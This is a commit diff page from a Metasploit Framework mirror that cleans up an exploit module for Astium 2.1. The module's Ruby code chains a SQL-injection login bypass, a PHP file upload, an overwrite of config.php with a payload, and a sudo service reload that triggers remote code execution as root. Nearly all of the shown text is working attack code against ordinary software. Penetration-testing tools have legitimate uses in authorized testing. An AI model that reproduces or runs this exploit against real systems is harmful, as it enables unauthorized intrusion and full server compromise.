infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #1 from jvazquez-r7/review-pr2379 

Clean up Astium exploit
bug/bundler_fix
xistence 2013-09-21 22:22:37 -07:00
parent adc1bd9c65 1a00cce8a9
commit 64156a1e09
1 changed files with 34 additions and 58 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

92
modules/exploits/linux/http/astium_sqli_upload.rb
View File

@ -8,7 +8,7 @@
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ManualRanking
Rank = ManualRanking # Configuration is overwritten and service reloaded
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
@ -17,12 +17,12 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => "Astium Remote Code Execution",
'Description' => %q{
This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and lower.
Admin access is gained by an SQL Injection authentication bypass in the login form.
Having admin access makes it possible to upload PHP code.
This PHP code will modify the "/usr/local/astium/web/php/config.php" script and add our payload.
A "sudo /sbin/service astcfgd reload" is executed to reload the configuration with root privileges
and trigger remote code execution.
This module exploits vulnerabilities found in Astium astium-confweb-2.1-25399 RPM and
lower. A SQL Injection vulnerability is used to achieve authentication bypass and gain
admin access. From an admin session arbitrary PHP code upload is possible. It is used
to add the final PHP payload to "/usr/local/astium/web/php/config.php" and execute the
"sudo /sbin/service astcfgd reload" command to reload the configuration and achieve
remote root code execution.
},
'License' => MSF_LICENSE,
'Author' =>
@ -31,13 +31,14 @@ class Metasploit3 < Msf::Exploit::Remote
],
'References' =>
[
[ 'OSVDB', '88860' ],
[ 'EDB', '23831' ]
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['Astium', {}]
['Astium 2.1', {}]
],
'Privileged' => true,
'DisclosureDate' => "Sep 17 2013",
@ -49,10 +50,15 @@ class Metasploit3 < Msf::Exploit::Remote
], self.class)
end
def check
uri = target_uri.path
peer = "#{rhost}:#{rport}"
def peer
return "#{rhost}:#{rport}"
end
def uri
return target_uri.path
end
def check
# Check version
print_status("#{peer} - Trying to detect Astium")
@ -69,55 +75,24 @@ class Metasploit3 < Msf::Exploit::Remote
end
def exploit
uri = target_uri.path
peer = "#{rhost}:#{rport}"
print_status("#{peer} - Retrieving cookie")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "en", "content", "index.php")
})
if res && res.code == 302
if (res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/)
session = $1
redirect = URI(res.headers['Location'])
print_status("#{peer} - Session cookie is [ #{session} ]")
print_status("#{peer} - Location is [ #{redirect} ]")
else
return fail_with(Exploit::Failure::Unknown, "Session cookie not found!")
end
else
return fail_with(Exploit::Failure::Unknown, "Retrieving cookie failed!")
end
# Follow redirection process
print_status("#{peer} - Following redirection")
res = send_request_cgi({
'uri' => "#{redirect}",
'method' => 'GET',
'cookie' => "astiumnls=#{session}"
})
if not res or res.code != 200
return fail_with(Exploit::Failure::Unknown, "Redirect Failed!")
end
print_status("#{peer} - Access login page")
res = send_request_cgi({
'method' => 'GET',
'cookie' => "astiumnls=#{session}",
'uri' => normalize_uri(uri, "?js=0&ctest=1&origlink=/en/content/index.php")
'uri' => normalize_uri(uri),
'vars_get' => {
'js' => '0',
'ctest' => '1',
'origlink' => '/en/content/index.php'
}
})
if res && res.code == 302
if res and res.code == 302 and res.get_cookies =~ /astiumnls=([a-zA-Z0-9]+)/
session = $1
print_good("#{peer} - Session cookie is [ #{session} ]")
redirect = URI(res.headers['Location'])
print_status("#{peer} - Location is [ #{redirect} ]")
else
return fail_with(Exploit::Failure::Unknown, "Access to login page failed!")
fail_with(Exploit::Failure::Unknown, "#{peer} - Access to login page failed!")
end
@ -130,9 +105,10 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 200
return fail_with(Exploit::Failure::Unknown, "Redirect failed!")
fail_with(Exploit::Failure::Unknown, "#{peer} - Redirect failed!")
end
sqlirandom = rand_text_numeric(8)
# SQLi to bypass authentication
@ -151,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote
})
if not res or res.code != 302
return fail_with(Exploit::Failure::Unknown, "Login bypass was not succesful!")
fail_with(Exploit::Failure::Unknown, "#{peer} - Login bypass was not succesful!")
end
# Random filename
@ -191,8 +167,8 @@ class Metasploit3 < Msf::Exploit::Remote
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200
return fail_with(Exploit::Failure::Unknown, "File wasn't uploaded, aborting!")
if not res or res.code != 200 or res.body !~ /#{payload_name}/
fail_with(Exploit::Failure::Unknown, "#{peer} - File wasn't uploaded, aborting!")
end
register_file_for_cleanup("/usr/local/astium/web/html/upload/#{payload_name}")
@ -202,12 +178,12 @@ class Metasploit3 < Msf::Exploit::Remote
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "upload", "#{payload_name}")
},60)
}, 60)
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either.
if res and res.code != 200
return fail_with(Exploit::Failure::Unknown, "Exploit failed!")
print_error("#{peer} - Unexpected response...")
end
end